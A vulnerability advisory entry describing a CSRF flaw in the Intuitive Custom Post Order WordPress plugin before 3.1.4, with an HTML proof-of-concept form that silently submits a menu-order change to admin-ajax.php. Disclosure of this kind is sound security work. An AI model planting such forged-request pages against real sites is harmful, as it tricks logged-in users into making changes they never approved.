WordPress Plugin Vulnerabilities
Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF
Description
The plugin lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="update-menu-order" /> <input type="hidden" name="order" value="post[]=7&post[]=5" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Yuya Kotake
Submitter
Yuya Kotake
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-24 (about 1 years ago)
Added
2023-01-24 (about 1 years ago)
Last Updated
2023-02-24 (about 1 years ago)